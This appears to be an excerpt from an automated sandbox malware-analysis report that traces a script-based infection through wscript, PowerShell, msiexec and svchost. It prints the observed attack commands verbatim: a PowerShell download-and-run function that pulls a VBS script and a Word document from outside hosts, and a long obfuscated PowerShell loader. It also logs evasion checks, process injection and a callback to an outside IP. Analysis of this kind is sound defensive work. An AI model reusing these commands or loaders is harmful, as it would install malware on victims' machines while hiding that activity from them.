                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. 
,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. 
,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A0C58 push eax; retf 6_2_00007FFD9B8A0D4D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A0CD3 push eax; retf 6_2_00007FFD9B8A0D4D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00356012 push 00000038h; iretd 20_3_0035601D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00355606 pushad ; retf 20_3_00355619
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_0035225D push eax; ret 20_3_0035225F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_003558BC pushad ; ret 20_3_003558C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_0035588E push eax; iretd 20_3_0035589D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_003528ED push ebx; ret 20_3_003528E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_003518C0 push ebp; retf 20_3_003518C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00354920 push 0000002Eh; iretd 20_3_00354922
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00355F0C push es; iretd 20_3_00355F0D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00351179 push FFFFFF82h; iretd 20_3_0035117B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_0035278B push ebx; ret 20_3_003528E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00355FEE push FFFFFFD2h; retf 20_3_00356011
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00350FEA push eax; ret 20_3_00350FF5
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D912D0 push eax; ret 20_2_04D912FE
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

                        Malware Analysis System Evasion

                        Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                        Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 4D9B83A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3944
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5929
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5663
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3992
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7249
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2581
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764 Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wscript.exe TID: 7860 Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060 Thread sleep count: 5663 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep time: -12912720851596678s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064 Thread sleep count: 3992 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356 Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7860 Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                        Source: C:\Windows\SysWOW64\svchost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: wscript.exe, 00000003.00000002.1822846195.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1798263879.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1801147978.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1818795448.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1800752301.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799076333.00000273F06A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm
                        Source: msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: wscript.exe, 00000003.00000002.1822846195.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1798263879.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1801147978.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1820273002.00000273F0628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799425978.00000273F0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1818795448.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1822846195.00000273F0628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1800752301.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799076333.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799585945.00000273F0638000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.3027616986.0000017D1B65A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 00000003.00000002.1823536963.00000273F0710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\r1
                        Source: msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                        Source: powershell.exe, 00000001.00000002.3150059195.00000295EFE2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1994677215.000001D2AC092000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                        Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04A28F99 LdrInitializeThunk,11_2_04A28F99
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 20_3_00350283 mov eax, dword ptr fs:[00000030h] 20_3_00350283

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
                        Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 45.149.241.141 2023
                        Source: Yara match File source: amsi64_7968.amsi.csv, type: OTHER
                        Source: Yara match File source: Process Memory Space: powershell.exe PID: 7968, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3CD0000
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\pqg5u7vt.doc" /o ""
                        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$realitetsbehandler='clairsentient';;$opdragerfunktion='nikau';;$amontilladoer='brucellosis';;$skuldret='picker74';;$supercanonisation=$host.name; function kommaernes($outbidder){if ($supercanonisation) {$nedblndedes='medbringe';$brions=2;$oakling=$brions}do{$stratigrapher+=$outbidder[$oakling];$oakling+=3} until(!$outbidder[$oakling])$stratigrapher}function satsstatistikken($vridning150){ .($misscribed) ($vridning150)}$spitefullest=kommaernes ' yn debyt.h. vw';$spitefullest+=kommaernes 'abepebu.cdilpii eed.n,vt';$gedeskindene=kommaernes ',nmj op zu ia lcllcoa ./';$amatren=kommaernes ' attrl isin1 c2';$oaklingnddragelses='sr[ fn.nechtde. bs desyr.vvarikncunenup toe ibanb.t,umrea unc aphge eprrn ]bo:a : hs oefocgluherm i tt,yt p,kra,oslt koo c ro flga= i$ ca mgra dt mr rem n';$gedeskindene+=kommaernes 'a 5,e.ov0 f(c wh,ibenopdglo w ss, gdns tch s 1kw0py. r0es;fu rewbyid nfa6f,4fl;o vaxsk6 w4ou;ot or ovs : .1s 3fn1sy.f 0gr)pu fgbredecp kbioly/fa2 c0cu1be0mo0ko1fe0bl1 , fef oi,er ie afbkoa xch/bi1 i3se1.a.be0';$enkemnds=kommaernes ',uusts ee ,rac-boastg fe ,ntat';$multilobulate=kommaernes 'knh,utcots p csci: / /glw.sw,owd .f ta,d.eeh jwab b.stcmeoaamfr/ nk ipox/rera etai aseusfou,ne arpr. gxn.s an b> ahpit bthup sd :mo/ex/ w,ywt,wta.urf dtm sshe snsog,oi lnceek,e.yrm.sin.lacsko mmsk/djkfam d/taromep.i sb s eu hepur o. 
,xsus un';$tunneling=kommaernes 'fo>';$misscribed=kommaernes 'k,i xeglx';$allieres24='dalsnkning';$medicates='\dyrehospitalerne.gra';satsstatistikken (kommaernes ' f$isgdrl o eb ua.alfa:tre .vdeains tiopoimnleea.rins c=re$eyef.n nvt,:.aagapunp adsla ft a ,+ o$ mbee dsti ic ha ktkoegys');satsstatistikken (kommaernes 'in$.igkolvaoovbunaswlor: riinnstujanmacnithou voblu sssa= m$slmbeu plglt pi rliloloblrum,l aafot zear.udsflpcrl fi lt a(ja$c,timubona,nk,enel eiexningo,)');satsstatistikken (kommaernes $oaklingnddragelses);$multilobulate=$inunctuous[0];$pressurized=(kommaernes 'ci$tigpolisotibu.adrlf :fod oefofp rb o tc k =s ns,egiwmu-cyowhbryj earc otdy afssvysps ht geovm k. b$reslepunisytboe kf eufrlfal ewis ,t');satsstatistikken ($pressurized);satsstatistikken (kommaernes 'de$swd eunfpar fof c.rkh,. rhule ianad aeprrs,sdg[tr$.aef ntrksue sm tnmud sun]s,=fo$l gste.edkve s uksci antadmae lnsee');$stoikerne=kommaernes 's,$sod ledyfi rneo .ccakfa.vadbropaw anfrllaofoa tdc f ri,olbiedo(c $damtuu kl lt oi ol aoo b iu ml nauotbieer,.a$ ,h vnoi,xr,iv,ue plsubd,e fvsng heenls seneilr,esph)';$hvirvelbevgelsers=$evasioners;satsstatistikken (kommaernes ' o$ vgallanon.b fagal b: sh uuansbaee,rkoeradbre espr= f(udtf.e ,sretsi-dip avitg hsk pr$ nhhivwaiprr.ovdee,jl b cesivnogfoefllsvsjoe,crspssk)');while (!$huseredes) {satsstatistikken (kommaernes 'uk$ jgaklpeolabodai lev:yah laa,lhusekh umagfygske a=te$remu.ia,sdyt dnrek pt') ;satsstatistikken $stoikerne;satsstatistikken (kommaernes 'des .tmaadrrskt s- r
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
